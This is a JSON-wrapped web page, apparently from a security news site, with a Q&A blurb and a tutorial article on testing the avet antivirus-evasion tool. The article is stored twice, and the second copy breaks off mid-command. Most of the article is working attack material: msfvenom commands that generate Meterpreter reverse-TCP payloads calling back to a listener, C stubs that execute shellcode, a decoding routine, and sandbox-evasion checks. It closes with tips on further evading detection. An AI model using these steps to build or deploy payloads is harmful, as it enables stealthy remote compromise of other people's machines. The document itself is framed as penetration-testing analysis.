[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fqs5lsCfXVvscuErn5eaylwDW1Av7383Qof4OP3QJlpI":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":34,"aiModel":39,"aiConfidence":39,"updatedAt":51,"createdAt":51,"_status":50},108,"What is avet and why is it significant in cybersecurity?","avet (AntiVirus Evasion Tool) is an open-source tool designed to bypass antivirus detection using various evasion techniques. It has been featured at Black Hat Arsenal events multiple times (Asia 2017, USA 2017, USA 2018), highlighting its importance in the cybersecurity community. The tool generates payloads that evade signature-based detection by leveraging custom encryption, sandbox evasion, and alternative shellcode delivery methods. [Learn more about its testing and analysis](\u002Fnews\u002Fantivirus-evasion-tool-avet-testing-and-analysis).","\u003Cp>avet (AntiVirus Evasion Tool) is an open-source tool designed to bypass antivirus detection using various evasion techniques. It has been featured at Black Hat Arsenal events multiple times (Asia 2017, USA 2017, USA 2018), highlighting its importance in the cybersecurity community. The tool generates payloads that evade signature-based detection by leveraging custom encryption, sandbox evasion, and alternative shellcode delivery methods. [Learn more about its testing and analysis](\u002Fnews\u002Fantivirus-evasion-tool-avet-testing-and-analysis).\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fantivirus-evasion-tool-avet-testing-and-analysis\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","what-is-avet-and-why-is-it-significant-in-cybersecurity-1777485134484","avet, antivirus evasion, Black Hat Arsenal, penetration testing",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":30,"cover":31,"author":32,"views":19,"readingTime":33,"status":34,"publishedAt":35,"seo":36,"tags":41,"qaPairs":42,"meta":47,"updatedAt":48,"createdAt":49,"_status":50},28,"AntiVirus Evasion Tool (avet) Testing and Analysis","antivirus-evasion-tool-avet-testing-and-analysis","Comprehensive testing and analysis of AVET, an antivirus evasion tool from BlackHat Arsenal. Learn setup, usage, and evasion techniques.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>avet is a tool designed to bypass antivirus detection, employing various anti-virus evasion techniques.\u003C\u002Fp>\u003Cp>It has been selected for blackhat ASIA 2017 arsenal, blackhat USA 2017 arsenal, and blackhat USA 2018 arsenal:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwww.blackhat.com\u002Fasia-17\u002Farsenal.html#avet-antivirus-evasion-tool\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwww.blackhat.com\u002Fus-17\u002Farsenal\u002Fschedule\u002Findex.html#avet---antivirus-evasion-tool-7908\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwww.blackhat.com\u002Fus-18\u002Farsenal\u002Fschedule\u002Findex.html#avet-antivirus-evasion-tool-10692\u003C\u002Fp>\u003Cp>GitHub open-source repository:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fgovolution\u002Favet\u003C\u002Fp>\u003Cp>This article will test it and analyze the anti-virus evasion techniques used by avet based on personal experience.\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following:\u003C\u002Fp>\u003Cul>\u003Cli>Environment Setup\u003C\u002Fli>\u003Cli>Usage Process\u003C\u002Fli>\u003Cli>Tool Implementation Details\u003C\u002Fli>\u003Cli>Technical Details Analysis\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Environment Setup\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Test System: kali2 x64\u003C\u002Fp>\u003Ch3>1. Download\u003C\u002Fh3>\u003Cp>https:\u002F\u002Fgithub.com\u002Fgovolution\u002Favet\u003C\u002Fp>\u003Ch3>2. Compile\u003C\u002Fh3>\u003Cp>If using 32-bit Kali system, compilation is required\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>gcc -o make_avet make_avet.c\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>64-bit Kali system does not require this\u003C\u002Fp>\u003Ch3>3. Install wine32\u003C\u002Fh3>\u003Cp>Otherwise, cannot generate exe\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019793280_0_9e05784170.jpeg\">\u003C\u002Fp>\u003Cp>Installation command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>dpkg --add-architecture i386 &amp;&amp; apt-get update &amp;&amp; apt-get install wine32\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>4. Install TDM GCC\u003C\u002Fh3>\u003Cp>Reference address:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgovolution.wordpress.com\u002F2017\u002F02\u002F04\u002Fusing-tdm-gcc-with-kali-2\u002F\u003C\u002Fp>\u003Cp>Download:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fsourceforge.net\u002Fprojects\u002Ftdm-gcc\u002F\u003C\u002Fp>\u003Cp>Install:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>wine tdm64-gcc-5.1.0-2.exe\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The installation window pops up, select Create\u003C\u002Fp>\u003Cp>Select MinGW-w64\u002FTDM64 (32-bit and 64-bit)\u003C\u002Fp>\u003Cp>Next, choose the default settings for all options, and finally install\u003C\u002Fp>\u003Ch3>5. Test\u003C\u002Fh3>\u003Cp>Execute:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.\u002Fmake_avet -h\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Get parameter description\u003C\u002Fp>\u003Ch2>0x03 Usage Process\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Execute avet_fabric.py\u003C\u002Fh3>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019801432_1_228028c2e8.jpeg\">\u003C\u002Fp>\u003Ch3>2. Select script\u003C\u002Fh3>\u003Cp>Here choose 7: build_win64_meterpreter_rev_tcp_xor.sh\u003C\u002Fp>\u003Ch3>3. Edit script content\u003C\u002Fh3>\u003Cp>Display default script content, which can be modified as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019817309_2_66a12a5ed5.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The script content corresponds to the file \u002Fbuild\u002Fbuild_win64_meterpreter_rev_tcp_xor.sh\u003C\u002Fp>\u003Cp>Default script content and description are as follows:\u003C\u002Fp>\u003Cp>(1) Specify GCC compilation settings, content as win64_compiler=\"wine gcc -m64\"\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>. build\u002Fglobal_win64.sh\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(2) Use meterpreter to generate a reverse payload and save it as sc.txt\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>msfvenom -p windows\u002Fx64\u002Fmeterpreter\u002Freverse_tcp lhost=192.168.116.142 lport=443 -e x64\u002Fxor -f c --platform Windows &gt; sc.txt\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(3) Read the content of sc.txt, extract the shellcode, and delete the file sc.txt\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.\u002Fformat.sh sc.txt &gt; scclean.txt &amp;&amp; rm sc.txt\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(4) Call make_avet, passing the shellcode and function flags to the file defs.h\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.\u002Fmake_avet -f scclean.txt -X -E\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(5) Use GCC to compile avet.c (which calls defs.h), generating the final file pwn.exe\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$win64_compiler -o pwn.exe avet.c\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(6) Delete the file scclean.txt and clear the file defs.h\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>rm scclean.txt &amp;&amp; echo \"\" &gt; defs.h\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>4. Execute to generate the final file\u003C\u002Fh3>\u003Cp>After confirming the script content, press Enter to execute the script, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019828134_3_898bea842c.jpeg\">\u003C\u002Fp>\u003Cp>Generate final file pwn.exe\u003C\u002Fp>\u003Ch2>0x04 Tool Implementation Details\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Generate payload via meterpreter and save file\u003C\u002Fh3>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>msfvenom -p windows\u002Fx64\u002Fmeterpreter\u002Freverse_tcp lhost=192.168.116.142 lport=443 -e x64\u002Fxor -f hex --platform Windows &gt; sc.txt\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>File content as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019839099_4_74f80c3b51.jpeg\">\u003C\u002Fp>\u003Ch3>2. Run format.sh to extract shellcode from previous file\u003C\u002Fh3>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.\u002Fformat.sh sc.txt &gt; scclean.txt\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Extracted file content as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019860413_5_373eb0f5e1.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Personally, I believe the above two steps can be achieved with one command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>msfvenom -p windows\u002Fx64\u002Fmeterpreter\u002Freverse_tcp lhost=192.168.116.142 lport=443 -e x64\u002Fxor -f hex --platform Windows &gt; sc.txt\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>3. Run make_avet to extract shellcode from previous file, set feature flags, and write to file defs.h\u003C\u002Fh3>\u003Cp>The function flags correspond to the various features supported by make_avet; detailed explanations can be obtained by executing .\u002Fmake_avet -h.\u003C\u002Fp>\u003Cp>The specific functions are as follows:\u003C\u002Fp>\u003Cul>\u003Cli>Read shellcode from a specified file and execute it.\u003C\u002Fli>\u003Cli>Read encrypted shellcode from a specified file, decrypt it, and then execute.\u003C\u002Fli>\u003Cli>Call iexplore.exe to access a specified URL, retrieve shellcode, and execute it.\u003C\u002Fli>\u003Cli>Use WinAPI socket calls to access port 80 of a specified URL, retrieve shellcode, and execute it.\u003C\u002Fli>\u003Cli>Download a file via certutil, retrieve shellcode, and execute it.\u003C\u002Fli>\u003Cli>Download a file via PowerShell, retrieve shellcode, and execute it.\u003C\u002Fli>\u003Cli>Use WinAPI fopen to bypass sandbox detection.\u003C\u002Fli>\u003Cli>Use WinAPI gethostbyname to bypass sandbox detection.\u003C\u002Fli>\u003Cli>Compile into a 64-bit executable.\u003C\u002Fli>\u003Cli>Hide the program window.\u003C\u002Fli>\u003C\u002Ful>\u003Ch3>4. Use gcc to compile avet.c, generating the final file.\u003C\u002Fh3>\u003Cp>avet.c is the main program, reading shellcode and function flags from the header file defs.h.\u003C\u002Fp>\u003Ch2>0x05 Technical Details Analysis\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Core code for executing shellcode\u003C\u002Fh3>\u003Cp>(1)\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>void exec_shellcode(unsigned char *shellcode)\u003Cbr>{\u003Cbr>\tint (*funct)();\u003Cbr>\tfunct = (int (*)()) shellcode;\u003Cbr>\t(int)(*funct)();\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Parameters for generating corresponding shellcode:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>msfvenom -p windows\u002Fmeterpreter\u002Freverse_tcp lhost=192.168.116.142 lport=443 -e x86\u002Fxor -f hex -a x86 --platform Windows &gt; sc.txt\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(2)\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>void exec_shellcode_ASCIIMSF(unsigned char *shellcode)\u003Cbr>{\u003Cbr>\tregister unsigned char* r asm(\"eax\");\u003Cbr>\\tr=shellcode;\u003Cbr>\\tasm(\"call *%eax;\");\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Parameters for generating shellcode:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>msfvenom -p windows\u002Fmeterpreter\u002Freverse_tcp lhost=192.168.116.142 lport=443 -e x86\u002Falpha_mixed -f hex -a x86 --platform Windows &gt; sc.txt\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(3)\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>void exec_shellcode64(unsigned char *shellcode)\u003Cbr>{\u003Cbr>\\tint len=strlen(shellcode);\u003Cbr>\\tDWORD l=0;\u003Cbr>\\tVirtualProtect(shellcode,len,PAGE_EXECUTE_READWRITE,&amp;l);\u003Cbr>\\t(* (int(*)()) shellcode)();\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Parameters for generating shellcode:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>msfvenom -p windows\u002Fx64\u002Fmeterpreter\u002Freverse_tcp lhost=192.168.116.142 lport=443 -e x64\u002Fxor -f hex --platform Windows &gt; sc.txt\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The encryption method for shellcode can also choose shikata_ga_nai. The parameters for using shikata_ga_nai encryption for 50 rounds are as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>msfvenom -p windows\u002Fmeterpreter\u002Freverse_tcp lhost=192.168.2.103 lport=443 -e x86\u002Fshikata_ga_nai -i 50 -f hex -a x86 --platform Windows &gt; sc.txt\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Supplement\u003C\u002Fstrong>：\u003C\u002Fp>\u003Cp>The method of executing shellcode is not unique; here is another example code for executing shellcode:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>void exec_shellcode(unsigned char *shellcode)\u003Cbr>{\u003Cbr>\t((void(*)(void))&amp;shellcode)();\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The method of generating shellcode is also not unique; you can generate shellcode according to your own ideas.\u003C\u002Fp>\u003Ch3>2、Self-implemented encryption and decryption algorithms\u003C\u002Fh3>\u003Cp>The corresponding parameter for encryption is:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.\u002Fmake_avet -E\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The corresponding code for decryption is:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>unsigned char* decode_shellcode(unsigned char *buffer, unsigned char *shellcode, int size)\u003Cbr>{\u003Cbr>\tint j=0;\u003Cbr>\tshellcode=malloc((size\u002F2));\u003Cbr>\tint i=0;\u003Cbr>\tdo\u003Cbr>\t{\u003Cbr>\t\tunsigned char temp[3]={0};\u003Cbr>\t\tsprintf((char*)temp,\"%c%c\",buffer[i],buffer[i+1]);\u003Cbr>\t\tshellcode[j] = strtoul(temp, NULL, 16);\u003Cbr>\t\ti+=2;\u003Cbr>\t\tj++;\u003Cbr>\t} while(i\u003Csize);\u003Cbr>\treturn shellcode;\u003Cbr>}\u003C\u002Fsize);\u003Cbr>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>3. Sandbox Evasion\u003C\u002Fh3>\u003Ch4>(1) Using WinAPI fopen\u003C\u002Fh4>\u003Cp>Save shellcode in file c:\\windows\\system.ini\u003C\u002Fp>\u003Cp>Read file c:\\windows\\system.ini during main program execution\u003C\u002Fp>\u003Cp>If in sandbox, unable to open file c:\\windows\\system.ini, main program automatically exits\u003C\u002Fp>\u003Cp>Key code:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>FILE *fp = fopen(\"c:\\\\windows\\\\system.ini\", \"rb\");\u003Cbr>if (fp == NULL)\u003Cbr>\treturn 0;\u003Cbr>fclose(fp);\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(2) Using WinAPI gethostbyname\u003C\u002Fh4>\u003Cp>Main program calls WinAPI gethostbyname to obtain host information for specified hostname\u003C\u002Fp>\u003Cp>If in sandbox, gethostbyname will return NULL, main program automatically exits\u003C\u002Fp>\u003Cp>Key code:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>struct hostent *hp = gethostbyname(KVALUE);\u003Cbr>if (hp != NULL) \t\t\u003Cbr>\texit(0);\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Methods for detecting sandbox conditions are not unique; examples include system process information, configuration information, device information, etc.\u003C\u002Fp>\u003Ch3>4. Supports remote execution via psexec\u003C\u002Fh3>\u003Cp>The main program is replaced with avetsvc.c\u003C\u002Fp>\u003Cp>Compared to avet.c, avetsvc.c adds service registration functionality, enabling remote startup via psexec as a service\u003C\u002Fp>\u003Ch2>0x06 Evasion Effectiveness\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Specific evasion effectiveness details omitted\u003C\u002Fp>\u003Cp>If detected, you can try the following methods:\u003C\u002Fp>\u003Cul>\u003Cli>Modify the shellcode\u003C\u002Fli>\u003Cli>Encrypt the shellcode\u003C\u002Fli>\u003Cli>Change the shellcode loading method\u003C\u002Fli>\u003Cli>Use a trusted program with a digital signature to launch the shellcode\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x07 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article conducts practical testing on avet, analyzing its technical details while omitting the actual antivirus evasion effectiveness.\u003C\u002Fp>\u003Cp>Overall, avet implements a complete framework, making it easy to perform secondary development on this basis, which indeed can enhance the efficiency of penetration testers.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>avet is a tool designed to bypass antivirus detection, employing various anti-virus evasion techniques.\u003C\u002Fp>\u003Cp>It has been selected for blackhat ASIA 2017 arsenal, blackhat USA 2017 arsenal, and blackhat USA 2018 arsenal:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwww.blackhat.com\u002Fasia-17\u002Farsenal.html#avet-antivirus-evasion-tool\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwww.blackhat.com\u002Fus-17\u002Farsenal\u002Fschedule\u002Findex.html#avet---antivirus-evasion-tool-7908\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwww.blackhat.com\u002Fus-18\u002Farsenal\u002Fschedule\u002Findex.html#avet-antivirus-evasion-tool-10692\u003C\u002Fp>\u003Cp>GitHub open-source repository:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fgovolution\u002Favet\u003C\u002Fp>\u003Cp>This article will test it and analyze the anti-virus evasion techniques used by avet based on personal experience.\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following:\u003C\u002Fp>\u003Cul>\u003Cli>Environment Setup\u003C\u002Fli>\u003Cli>Usage Process\u003C\u002Fli>\u003Cli>Tool Implementation Details\u003C\u002Fli>\u003Cli>Technical Details Analysis\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Environment Setup\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Test System: kali2 x64\u003C\u002Fp>\u003Ch3>1. Download\u003C\u002Fh3>\u003Cp>https:\u002F\u002Fgithub.com\u002Fgovolution\u002Favet\u003C\u002Fp>\u003Ch3>2. Compile\u003C\u002Fh3>\u003Cp>If using 32-bit Kali system, compilation is required\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>gcc -o make_avet make_avet.c\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>64-bit Kali system does not require this\u003C\u002Fp>\u003Ch3>3. Install wine32\u003C\u002Fh3>\u003Cp>Otherwise, cannot generate exe\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019793280_0_9e05784170-1.jpeg\">\u003C\u002Fp>\u003Cp>Installation command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>dpkg --add-architecture i386 &amp;&amp; apt-get update &amp;&amp; apt-get install wine32\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>4. Install TDM GCC\u003C\u002Fh3>\u003Cp>Reference address:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgovolution.wordpress.com\u002F2017\u002F02\u002F04\u002Fusing-tdm-gcc-with-kali-2\u002F\u003C\u002Fp>\u003Cp>Download:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fsourceforge.net\u002Fprojects\u002Ftdm-gcc\u002F\u003C\u002Fp>\u003Cp>Install:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>wine tdm64-gcc-5.1.0-2.exe\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The installation window pops up, select Create\u003C\u002Fp>\u003Cp>Select MinGW-w64\u002FTDM64 (32-bit and 64-bit)\u003C\u002Fp>\u003Cp>Next, choose the default settings for all options, and finally install\u003C\u002Fp>\u003Ch3>5. Test\u003C\u002Fh3>\u003Cp>Execute:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.\u002Fmake_avet -h\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Get parameter description\u003C\u002Fp>\u003Ch2>0x03 Usage Process\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Execute avet_fabric.py\u003C\u002Fh3>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019801432_1_228028c2e8-1.jpeg\">\u003C\u002Fp>\u003Ch3>2. Select script\u003C\u002Fh3>\u003Cp>Here choose 7: build_win64_meterpreter_rev_tcp_xor.sh\u003C\u002Fp>\u003Ch3>3. Edit script content\u003C\u002Fh3>\u003Cp>Display default script content, which can be modified as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019817309_2_66a12a5ed5-1.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The script content corresponds to the file \u002Fbuild\u002Fbuild_win64_meterpreter_rev_tcp_xor.sh\u003C\u002Fp>\u003Cp>Default script content and description are as follows:\u003C\u002Fp>\u003Cp>(1) Specify GCC compilation settings, content as win64_compiler=\"wine gcc -m64\"\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>. build\u002Fglobal_win64.sh\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(2) Use meterpreter to generate a reverse payload and save it as sc.txt\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>msfvenom -p windows\u002Fx64\u002Fmeterpreter\u002Freverse_tcp lhost=192.168.116.142 lport=443 -e x64\u002Fxor -f c --platform Windows &gt; sc.txt\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(3) Read the content of sc.txt, extract the shellcode, and delete the file sc.txt\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.\u002Fformat.sh sc.txt &gt; scclean.txt &amp;&amp; rm sc.txt\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(4) Call make_avet, passing the shellcode and function flags to the file defs.h\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.\u002Fmake_avet -f scclean.txt -X -E\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(5) Use GCC to compile avet.c (which calls defs.h), generating the final file pwn.exe\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$win64_compiler -o pwn.exe avet.c\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(6) Delete the file scclean.txt and clear the file defs.h\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>rm scclean.txt &amp;&amp; echo \"\" &gt; defs.h\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>4. Execute to generate the final file\u003C\u002Fh3>\u003Cp>After confirming the script content, press Enter to execute the script, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019828134_3_898bea842c-1.jpeg\">\u003C\u002Fp>\u003Cp>Generate final file pwn.exe\u003C\u002Fp>\u003Ch2>0x04 Tool Implementation Details\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Generate payload via meterpreter and save file\u003C\u002Fh3>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>msfvenom -p windows\u002Fx64\u002Fmeterpreter\u002Freverse_tcp lhost=192.168.116.142 lport=443 -e x64\u002Fxor -f hex --platform Windows &gt; 